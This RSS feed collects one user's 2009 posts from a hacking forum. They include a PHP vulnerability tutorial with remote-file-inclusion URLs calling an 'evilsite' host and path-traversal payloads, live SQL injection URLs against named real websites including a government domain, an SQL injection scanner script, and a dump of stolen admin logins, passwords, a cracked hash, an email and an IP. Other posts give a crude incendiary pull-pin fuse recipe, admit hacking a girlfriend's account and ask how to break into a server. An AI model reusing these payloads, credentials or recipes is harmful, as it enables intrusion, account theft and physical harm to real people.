<?xml version="1.0" encoding="ISO-8859-1"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
	<title>Blood - Rss Feed</title>
	<link>http://www.anarchistcookbook.com/member.php?u=40263</link>
	<description>A social site powered by it's members</description>
	<language>en</language>
	<generator>H.Atakan KOC www.sonkonu.com</generator>
	<ttl>60</ttl>
		<item>
			<title>Finding Vulnerabilities in PHP scripts</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=32230</link>
			<pubDate>Tue, 06 Oct 2009 19:10:58 GMT</pubDate>
			<description><![CDATA[*[NOTE] if you see ***** that means it's sensored. It's most likely the word ***** so just replace it.* 
 
 
1) About 
 2) Some stuff 
 3) Remote...]]></description>
			<content:encoded><![CDATA[<b><font color="Red">[NOTE] if you see ***** that means it's sensored. It's most likely the word <font color="Black">ad</font>min so just replace it.</font></b><br />
<br />
<br />
1) About<br />
 2) Some stuff<br />
 3) Remote File Inclusion<br />
    3.0 - Basic example<br />
	3.1 - Simple example<br />
	3.2 - How to fix<br />
 4) Local File Inclusion<br />
    4.0 - Basic example<br />
	4.1 - Simple example<br />
	4.2 - How to fix<br />
 5) Local File Disclosure/Download<br />
    5.0 - Basic example<br />
	5.1 - Simple example<br />
	5.2 - How to fix<br />
 6) SQL Injection<br />
    6.0 - Basic example<br />
	6.1 - Simple example<br />
	6.2 - SQL Login Bypass<br />
	6.3 - How to fix<br />
 7) Insecure Cookie Handling<br />
    7.0 - Basic example<br />
	7.1 - Simple example<br />
	7.2 - How to fix<br />
 8) Remote Command Execution<br />
    8.0 - Basic example<br />
	8.1 - Simple example<br />
	8.2 - Advanced example<br />
	8.3 - How to fix<br />
 9) Remote Code Execution<br />
    9.0 - Basic example<br />
    9.1 - Simple example<br />
	9.2 - How to fix<br />
 10) Cross-Site Scripting<br />
    10.0 - Basic example<br />
    10.1 - Another example<br />
	10.2 - Simple example<br />
	10.3 - How to fix<br />
 11) Authentication Bypass<br />
    11.0 - Basic example<br />
    11.1 - Via login variable<br />
	11.2 - Unprotected ***** CP<br />
	11.3 - How to fix<br />
 12) Insecure Permissions<br />
    12.0 - Basic example<br />
    12.1 - Read the users/passwords<br />
	12.2 - Download backups<br />
	12.3 - INC files<br />
	12.4 - How to fix<br />
 13) Cross Site Request Forgery<br />
    13.0 - Basic example<br />
	13.1 - Simple example<br />
	13.2 - How to fix<br />
 14) Shoutz<br />
 <br />
  <br />
     1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain<br />
	   how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the <br />
	   examples without the basic example of each category was founded in different scripts.<br />
  <br />
  <br />
     2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.<br />
	You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions<br />
    to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what<br />
    configuration I use and why :<br />
<br />
   safe_mode = off ( a lot of shit cannot be done with this on )<br />
   disabled_functions = N/A ( no one,we want all )<br />
   register_globals = on ( we can set variables by request )<br />
   allow_url_include = on ( for lfi/rfi )<br />
   allow_url_fopen = on ( for lfi/rfi )<br />
   magic_quotes_gpc = off ( this will escape ' &quot;  \  and NUL's  with a backslash and we don't want that )<br />
   short_tag_open = on ( some scripts are using short tags,better on ) <br />
   file_uploads = on ( we want to upload )<br />
   display_errors = on ( we want to see the script errors,maybe some undeclared variables? )<br />
 <br />
      How to proceed : First,create a database to be used by different scripts.Install the script on<br />
    localhost and start the audit over the source code.If you found something open the web browser and<br />
    test it,maybe you are wrong.<br />
	<br />
<br />
     3) Remote File Inclusion<br />
	 <br />
	 <br />
	     - Tips : You can use the NULLBYTE and ? trick.<br />
		          You can use HTTPS and FTP to bypass filters ( http filtered )<br />
		 <br />
	 <br />
	   In PHP is 4 functions through you can include code.<br />
<br />
         require - require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.<br />
         require_once - is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.<br />
         include - includes and evaluates the specified file.<br />
         include_once -  includes and evaluates the specified file during the execution of the script.	 <br />
	 <br />
	 <br />
	   3.0 - Basic example<br />
	   <br />
	   <br />
	      - Tips : some scripts don't accept &quot;http&quot; in variables,&quot;http&quot; word is forbbiden so<br />
		  you can use &quot;https&quot; or &quot;ftp&quot;.<br />
	   <br />
	      - Code snippet from test.php<br />
		  <br />
		 -----------------------------------------------<br />
		 &lt;?php<br />
		 $pagina=$_GET['pagina'];<br />
		 include $pagina;<br />
		 ?&gt;<br />
		 -----------------------------------------------<br />
		 <br />
		 - If we access the page we got some errors and some warnings( not pasted ) :<br />
		 <br />
		 Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2<br />
<br />
        - We can see here that &quot;pagina&quot; variable is undeclared.We can set any value to &quot;pagina&quot; variable.Example : <br />
		<br />
		     <a href="http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt" target="_blank">http://127.0.0.1/test.php?pagina=htt...evilscript.txt</a><br />
			 <br />
			Now I will show why some people use ? and %00 after the link to the evil script.<br />
			<br />
		  # The &quot;%00&quot;<br />
<br />
		 - Code snippet from test.php<br />
		  <br />
		 -----------------------------------------------<br />
		 &lt;?php<br />
         $pagina=$_GET['pagina'];<br />
         include $pagina.'.php';<br />
         ?&gt;<br />
		 -----------------------------------------------<br />
		 <br />
		  - So if we will request <br />
		  <br />
		     <a href="http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt" target="_blank">http://127.0.0.1/test.php?pagina=htt...evilscript.txt</a><br />
		  <br />
		  Will not work because the script will try to include <a href="http://evilsite.com/evilscript.txt.php" target="_blank">http://evilsite.com/evilscript.txt.php</a><br />
		  <br />
		  So we will add a NULLBYTE ( %00 ) and all the shit after nullbyte will not be taken in<br />
		  consideration.Example : <br />
		  <br />
		     <a href="http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00" target="_blank">http://127.0.0.1/test.php?pagina=htt...lscript.txt%00</a><br />
			 <br />
		 The script will successfully include our evilscript and will throw to junk the things<br />
		 after the nullbyte.<br />
		 <br />
		  # The &quot;?&quot;<br />
		 <br />
		 	- Code snippet from test.php<br />
		  <br />
		 -----------------------------------------------<br />
		 &lt;?php<br />
         $pagina=$_GET['pagina'];<br />
         include $pagina.'logged=1';<br />
         ?&gt;<br />
		 -----------------------------------------------<br />
		 <br />
		   And the logged=1 will become like a variable.But better use nullbyte.Example : <br />
		   <br />
		     <a href="http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1" target="_blank">http://127.0.0.1/test.php?pagina=htt...t.txt?logged=1</a><br />
			 <br />
		  The evilscript will be included succesfully.<br />
		  <br />
		  <br />
	   3.1 - Simple example	 <br />
	   <br />
	   <br />
	       Now an example from a script.<br />
		   <br />
		    - Code snippet from index.php<br />
			<br />
		 ----------------------------------------------------<br />
			        if (isset($_REQUEST[&quot;main_content&quot;])){<br />
            $main_content = $_REQUEST[&quot;main_content&quot;];<br />
         } else if (isset($_SESSION[&quot;main_content&quot;])){<br />
            $main_content = $_SESSION[&quot;main_content&quot;];<br />
         }<br />
		   .......................etc..................<br />
		           ob_start();<br />
          require_once($main_content);<br />
		 ----------------------------------------------------<br />
		 <br />
		    We can see that &quot;main_content&quot; variable is requested by $_REQUEST method.The attacker can <br />
		set any value that he want. Below the &quot;main_content&quot; variable is include.So if we make the<br />
		following request :<br />
		<br />
		     <a href="http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt" target="_blank">http://127.0.0.1/index.php?main_cont...evilscript.txt</a><br />
			 <br />
		  Our evil script will be successfully included.<br />
		  <br />
		  <br />
	   3.2 - How to fix<br />
	   <br />
	   <br />
	       Simple way : Don't allow special chars in variables.Simple way : filter the slash &quot;/&quot; .<br />
		   Another way : filter &quot;http&quot; , &quot;https&quot; , &quot;ftp&quot; and &quot;smb&quot;.<br />
			 <br />
     <br />
	 4) Local File Inclusion<br />
	 <br />
	<br />
	      - Tips : You can use the NULLBYTE and ? trick.<br />
		         ../ mean a directory up<br />
				 On Windows systems we can use &quot;..\&quot; instead of &quot;../&quot; .The &quot;..\&quot; will become &quot;..%5C&quot; ( urlencoded ).<br />
	 <br />
	   The same functions which let you to include (include,include_once,require,require_once) .<br />
	 <br />
	 <br />
	   4.0 - Basic example<br />
	   <br />
		  <br />
		   - Code snippet from test.php<br />
		   <br />
		   -----------------------------------<br />
		    &lt;?php<br />
		    $pagina=$_GET['pagina'];<br />
		    include '/pages/'.$pagina;<br />
		    ?&gt;<br />
		   -----------------------------------<br />
		   <br />
		     Now,we can not include our script because we can not include remote files.We can include only<br />
			local files as you see.So if we make the following request : <br />
	   <br />
	           <a href="http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd" target="_blank">http://127.0.0.1/test.php?pagina=../.../../etc/passwd</a><br />
			   <br />
			 The script will include &quot;/pages/../../../../../../etc/passwd&quot; successfully.<br />
			 <br />
             You can use the %00 and ? .The same story.		<br />
			<br />
			<br />
	   4.1 - Simple example<br />
	   <br />
	   <br />
	      - Code snippet from install/install.php<br />
		  <br />
		  -------------------------------------<br />
		   if(empty($_GET[&quot;url&quot;]))<br />
  	       $url = 'step_welcome.php';<br />
           else<br />
  	       $url = $_GET[&quot;url&quot;];<br />
		   .............etc.............<br />
		   &lt;p&gt;&lt;? include('step/'.$url) ?&gt;&lt;/p&gt;<br />
		  -------------------------------------]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=32230</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=50">Tutorials</category>
			<dc:creator>Blood</dc:creator>>
		</item>
		<item>
			<title>Pussies. (Not female)</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=32169</link>
			<pubDate>Wed, 30 Sep 2009 21:09:35 GMT</pubDate>
			<description><![CDATA[So my mother got this new boyfriend right. This dude is really nice, treats her right and all. (By the way i'm venting so don't flame :D Just thought...]]></description>
			<content:encoded><![CDATA[So my mother got this new boyfriend right. This dude is really nice, treats her right and all. (By the way i'm venting so don't flame <img src="images/smilies/biggrin.gif" border="0" alt="" title="Big Grin" class="inlineimg" /> Just thought I should share how I feel about bitches.) So a quick background of me and my mother to help you understand, When I was born my rich dad left blah blah, my mom had no education so she became a stripper so she could feed me. We had no family and aall that nonsense. After abusive relationship after abusive relationship we finally found this really nice guy for her. So i'm staying with them at the moment. My mom's a heavy alcoholic and one night i'm in my room, and I hear &quot;Owwww ];&quot; like a litle girl crying almost. Then I hear my moms boyfriends 300 pound ass jogging through the hall to my room and he opens my door and is like<br />
&quot;Christian! Help, your moms going crazy&quot;.<br />
I've dealt with my mom before so I grab her by the arm and pull her into my room, shut the door and light a cig for her. The whole time she's trying to open the door and yelling &quot;He wants to fuck me in the ass, he's a fucking faggot, he likes buttholes&quot; and im laughing my ass off. Me, being stressed out pull out a sack of weed and start smokin some afgan kush. Well, I later find out when I got my mom in my room my step dad RAN, like RANNN into his room slammed the door and locked it, then locked his patio door and locked all his windows. So here it is, 5 o clock in the morning and I haven't slept and his fat ass is dreamin away while he makes ME take care of his problem. Yes it's my mom, but he knew she was like this when he started datin her, i've been doin this shit my whole life, can not one guy just man up besides me for once? He calls me hunny and sweetheart all the time and basically he is just a big pussy. I've lived in detroit, and miami, and phoenix az. and I have to say, I have never met such a big flaming fat double chin having nice friendly pussy ass bitch, in my whole life. [:<br />
<br />
anyway like I said don't be hatin, I just thought I should share this with some of the people on here who have been through the same shit as me and understand this dude is a big fucking <font size="7">PUSSY.</font> And it frustrates me.<br />
Thanks for readin this if you did lmao]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=32169</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=56">Enlightened Individuals</category>
			<dc:creator>Blood</dc:creator>>
		</item>
		<item>
			<title>Guess who's back</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=32035</link>
			<pubDate>Sun, 20 Sep 2009 05:42:27 GMT</pubDate>
			<description><![CDATA[http://elkotob.com/news.php?id=-1+union+select+1,concat_ws(0x3a,password),user+from+mysql.user-- 
...]]></description>
			<content:encoded><![CDATA[<a href="http://elkotob.com/news.php?id=-1+union+select+1,concat_ws(0x3a,password),user+from+mysql.user--" target="_blank">http://elkotob.com/news.php?id=-1+un...m+mysql.user--</a><br />
<br />
<a href="http://bitlis.meb.gov.tr/hb.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6" target="_blank">http://bitlis.meb.gov.tr/hb.php?id=-...ion()),3,4,5,6</a><br />
<br />
meow.]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=32035</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=25">Pwns</category>
			<dc:creator>Blood</dc:creator>>
		</item>
		<item>
			<title>My Favorite Songs.</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=30645</link>
			<pubDate>Sun, 07 Jun 2009 05:20:05 GMT</pubDate>
			<description><![CDATA[Warning : Not for little ears. 
TEST 
[youtube] 
<object width="425" height="25"><param name="movie"...]]></description>
			<content:encoded><![CDATA[Warning : Not for little ears.<br />
TEST<br />
[youtube]<br />
&lt;object width=&quot;425&quot; height=&quot;25&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/kagDYw8g1H8&amp;hl=en&amp;fs=1&amp;&amp;autoplay=1&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;******* src=&quot;http://www.youtube.com/v/kagDYw8g1H8&amp;hl=en&amp;fs=1&amp;&amp;autoplay=1&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;425&quot; height=&quot;25&quot;&gt;&lt;/embed&gt;&lt;/object&gt;[/youtube]<br />
[youtube]<br />
&lt;object width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/2tzSjtuMGOQ&amp;hl=en&amp;fs=1&amp;color1=0x5d1719&amp;color2=0xcd  311b&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;******* src=&quot;http://www.youtube.com/v/2tzSjtuMGOQ&amp;hl=en&amp;fs=1&amp;color1=0x5d1719&amp;color2=0xcd  311b&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;/embed&gt;&lt;/object&gt;[/youtube]<br />
[youtube]<br />
&lt;object width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/vfhVbEaMQEg&amp;hl=en&amp;fs=1&amp;color1=0x234900&amp;color2=0x4e  9e00&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;******* src=&quot;http://www.youtube.com/v/vfhVbEaMQEg&amp;hl=en&amp;fs=1&amp;color1=0x234900&amp;color2=0x4e  9e00&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;/embed&gt;&lt;/object&gt;[/youtube]<br />
[youtube]<br />
&lt;object width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/ZwxLL1gtJbA&amp;hl=en&amp;fs=1&amp;color1=0x234900&amp;color2=0x4e  9e00&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;******* src=&quot;http://www.youtube.com/v/ZwxLL1gtJbA&amp;hl=en&amp;fs=1&amp;color1=0x234900&amp;color2=0x4e  9e00&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;/embed&gt;&lt;/object&gt;<br />
[/youtube]<br />
<br />
More coming soon! <img src="images/smilies/biggrin.gif" border="0" alt="" title="Big Grin" class="inlineimg" />]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=30645</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=44">Hip-Hop (Rap)</category>
			<dc:creator>Blood</dc:creator>>
		</item>
		<item>
			<title>How to make a pull pin fuse.</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=30643</link>
			<pubDate>Sun, 07 Jun 2009 04:27:34 GMT</pubDate>
			<description><![CDATA[EZ. 
Thanks Blood. 
Anyway get a box of matches. Stick the matches together with the heads facing up and one or two facing down. Take a paperclip and...]]></description>
			<content:encoded><![CDATA[EZ.<br />
Thanks Blood.<br />
Anyway get a box of matches. Stick the matches together with the heads facing up and one or two facing down. Take a paperclip and make a ring. Cut off the strip of paper from the box that you strike the matches on. Put it on it so the middle of the strike board is on the top of the matches and so that the rest of it comes down on the side. Attach the paperclip. And get creative to do the rest.]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=30643</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=10">Pyro</category>
			<dc:creator>Blood</dc:creator>>
		</item>
		<item>
			<title>SQL Injection Scanner - PHP -</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=30642</link>
			<pubDate>Sun, 07 Jun 2009 04:23:47 GMT</pubDate>
			<description><![CDATA[<?php 
  
 #PHP SQL Injection Scanner. 
 #BTW: IP = Fail Proxy = Win. 
  
 $http  = ''; 
  
 if($http == '') 
    die("Http is empty!\n\n<b>So go...]]></description>
			<content:encoded><![CDATA[&lt;?php<br />
 <br />
 #PHP SQL Injection Scanner.<br />
 #BTW: IP = Fail Proxy = Win.<br />
 <br />
 $http  = '';<br />
 <br />
 if($http == '')<br />
    die(&quot;Http is empty!\n\n&lt;b&gt;So go suck a dick skid.&lt;/b&gt;\n# &quot;);<br />
 <br />
 echo &quot;Scan for : &lt;b&gt;$http&lt;/b&gt; \n\n&quot;;<br />
 <br />
 $http  = (substr($http, -1) != '/') ? $http.'/' : $http;<br />
 $found = getGet();<br />
 <br />
 function getGet()<br />
 {<br />
    global $http;<br />
     <br />
    $getN = array();<br />
    $fenN = array();<br />
                 <br />
    $htm = @file_get_contents($http);<br />
          @preg_match_all('/((\/[a-zA-Z0-9]+\/)|)([a-zA-Z0-9]+\.[a-zA-Z0-9]+\?)([a-zA-Z0-9]+)(\s*\=)([a-zA-Z0-9]+)/im', $htm, $gets);<br />
 <br />
    foreach($gets[0] as $get)<br />
    {<br />
       $get = str_replace($http, '', $get);<br />
   <br />
       if(!in_array($get, $getN))<br />
       {<br />
          @preg_match_all('/(.*)(\?)/', $get, $gn);<br />
           $name = str_replace('?', '', $gn[1][0]);<br />
 <br />
           if(!@in_array($name, $fenN) &amp;&amp; @in_array(substr(strrchr($name, &quot;.&quot;), 1), array('php', 'asp', 'aspx'))){<br />
              $getN[] = $get;<br />
               $fenN[] = $name;<br />
           }   <br />
       }   <br />
    }<br />
    return $getN;<br />
 }<br />
 <br />
 foreach($found as $get)<br />
 { <br />
    $address = $http.$get;<br />
    <br />
    $htm1 = @file_get_contents($address);<br />
    $htm2 = @file_get_contents($address.'%20and%20\'a\'%20=%20  \'a\'');<br />
     <br />
    if($htm1 == $htm2)<br />
       echo $get.&quot; &lt;b&gt;&lt;font color=\&quot;#1B9B1B\&quot;&gt;SQL injection!&lt;/font&gt;&lt;/b&gt; \n&quot;;<br />
    else<br />
       echo $get.&quot; &lt;b&gt;&lt;font color=\&quot;#D80404\&quot;&gt;Failed!&lt;/font&gt;&lt;/b&gt; \n&quot;;<br />
     <br />
 }<br />
 <br />
 echo &quot;\n\n&lt;b&gt;What a useless thing.&lt;/b&gt;\n&quot;;<br />
 <br />
?&gt;]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=30642</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=26">Programming</category>
			<dc:creator>Blood</dc:creator>>
		</item>
		<item>
			<title>Insecure Girlfriend.</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=30628</link>
			<pubDate>Fri, 05 Jun 2009 03:47:33 GMT</pubDate>
			<description><![CDATA[So i've got this insecure girlfriend right. I had like 800 friends on myspace and she bitches about it all the time. 
I really like her so I say,...]]></description>
			<content:encoded><![CDATA[So i've got this insecure girlfriend right. I had like 800 friends on myspace and she bitches about it all the time.<br />
I really like her so I say, Fuck it and delete my myspace.<br />
I make a new one that i'm only allowed to add her, and friends on (guys). so i say what the fuck ever idc myspace is gay so I do that. Then, i find out this bitch uses tumblr. So I hack her tumblr and what do I find? 260 guys added. Then i go to her myspace friends and there are like 5 guys. Then I go to her face book and there are a shit load.<br />
<br />
What a fucking hypocrite.<br />
Not to mention i'm moving from Arizona to fucking hicktown Kansas for this bitch, And she cant even fucking do as she says?]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=30628</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=49">Dating & Relationships</category>
			<dc:creator>Blood</dc:creator>>
		</item>
		<item>
			<title>I've got</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=30626</link>
			<pubDate>Fri, 05 Jun 2009 02:14:28 GMT</pubDate>
			<description><![CDATA[A Microsoft 2003 server. I don't have the ID or Password to get in, Anyone know any vulns or any ways to get in?]]></description>
			<content:encoded><![CDATA[A Microsoft 2003 server. I don't have the ID or Password to get in, Anyone know any vulns or any ways to get in?]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=30626</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=51">Help Me</category>
			<dc:creator>Blood</dc:creator>>
		</item>
		<item>
			<title>Blood's pwn dump ;x</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=30622</link>
			<pubDate>Thu, 04 Jun 2009 20:56:36 GMT</pubDate>
			<description><![CDATA[Dont ask any questions, If you don't know how to use any of this then you shouldn't have it anyway. 
Dont use this shit without posting a reply. 
And...]]></description>
			<content:encoded><![CDATA[Dont ask any questions, If you don't know how to use any of this then you shouldn't have it anyway.<br />
Dont use this shit without posting a reply.<br />
And if anyone flames or is fucking negative at all i'll take this off and stop updating this.<br />
Thanks. &lt;3<br />
<br />
<br />
<br />
<a href="http://www.salam-co.com/*****/" target="_blank">http://www.salam-co.com/*****/</a><br />
salam<br />
123<br />
------------------------------------------------------------------------<br />
<a href="http://www.houseandhouse.it/gestisci/login.asp" target="_blank">http://www.houseandhouse.it/gestisci/login.asp</a><br />
ad<font color="Black">mi</font>n<br />
onebl00d<br />
the language is Italian and the page says &quot;This server is managed by Ciociariaweb Snc<br />
:: The site you are looking for is in a configuration:<br />
Please Wait ... you will be returned to the official site<br />
Ciociariaweb Snc:: 2007::&quot;<br />
------------------------------------------------------------------------<br />
<a href="http://www.scarpettacarrelli.com/db/login.asp" target="_blank">http://www.scarpettacarrelli.com/db/login.asp</a><br />
User: eurolift<br />
Password: onebl00d<br />
------------------------------------------------------------------------<br />
<a href="http://www.raisinggodlytomatoes.com/ubbthreads/" target="_blank">http://www.raisinggodlytomatoes.com/ubbthreads/</a><br />
USER_ID: 2<br />
USER_LOGIN_NAME: Shane32<br />
USER_DISPLAY_NAME: Shane32<br />
USER_PASSWORD: 81dc9bdb52d04dc20036dbd8313ed055<br />
USER_CRACKED_PASS: 1234<br />
USER_MEMBERSHIP_LEVEL: Administrator<br />
USER_REGISTRATION_EMAIL: <a href="mailto:shane@sackcorp.com">shane@sackcorp.com</a><br />
USER_REGISTRATION_IP: 68.41.135.16<br />
USER_SESSION_ID: c6a01432c8138d46ba39957a8250e027<br />
USER_IS_APPROVED: yes]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=30622</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=25">Pwns</category>
			<dc:creator>Blood</dc:creator>>
		</item>
		<item>
			<title>Basic Hacking Tutorial 1</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=30573</link>
			<pubDate>Sat, 30 May 2009 22:23:36 GMT</pubDate>
			<description><![CDATA[First off, You really need to think about what you wish to accomplish by hacking. Hacking is a term that has so many different definitions and could...]]></description>
			<content:encoded><![CDATA[First off, You really need to think about what you wish to accomplish by hacking. Hacking is a term that has so many different definitions and could have endless tutorials, because hacking is a generalized word. Basically, &quot;Hacking&quot; means Gaining unauthorized access to a program/website/database/server/computer/etc. with the motive of gaining. Whether it be gaining popularity amongst underground hackers or gaining money from a fraud, Hacking is about gain.<br />
(Since I know i'll get flamed for this I know a &quot;Hacker&quot; is about wanting to learn, But everyone here is smart enough to know that when someone thinks of a &quot;hacker&quot; the last thing they think about is learning. They think about stealing, and well, &quot;Hacking&quot;.<br />
<br />
Before I teach you the basics of what I know, I'm going to teach you how not to be a fucking retard. First of all, If something looks like a trap, It's a trap. It needs to be a trap in your eyes whether it is or not, Because in hacking you have to lose some to win some. And if you don't want to be the next Hacker turned Prison Bitch then follow these simple guidelines.<br />
1. Don't hack for popularity.<br />
2. Don't hack &quot;accidently&quot;.<br />
3. Don't brag to other hackers about how good you are at hacking, Because chances are someone there is better, And will show you that.<br />
4. Don't tell people who know you in real life your hacking alias.<br />
(Example) Lets say you go to a school and a group of kids ask you if you've ever hacked before. You say yes, you hacked <a href="http://www.insurance-fla.com" target="_blank">www.insurance-fla.com</a> and your nickname is Blood. You then get in a fight for kissing the kids bestfriends girlfriend, He narks on you and you go down along with your alias.<br />
<br />
Now that we are done with the *****g shit lets get the basics. <br />
<br />
What do I need? -(Compliments to Jolly Roger)<br />
*A Computer<br />
*A Modem (Device that uses phone lines to transfer Data)<br />
*The Phone number - You can get this by scanning, or Directory Assistance. Directory assistance only works if you know where the target machine is.<br />
*Answer to identity elements.<br />
<br />
So to teach you i'm going to act as if you are using the Directory assistance method.<br />
Call 411 and say *City*, Then say SRI, write down the numbers, Ask if there are any more if so write them down, Dial the numbers and listen for a carrier tone, If you hear them dial them on your modem and viola, Your set to hack.<br />
-Anarchists Cookbook-]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=30573</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=50">Tutorials</category>
			<dc:creator>Blood</dc:creator>>
		</item>
	</channel>
</rss>
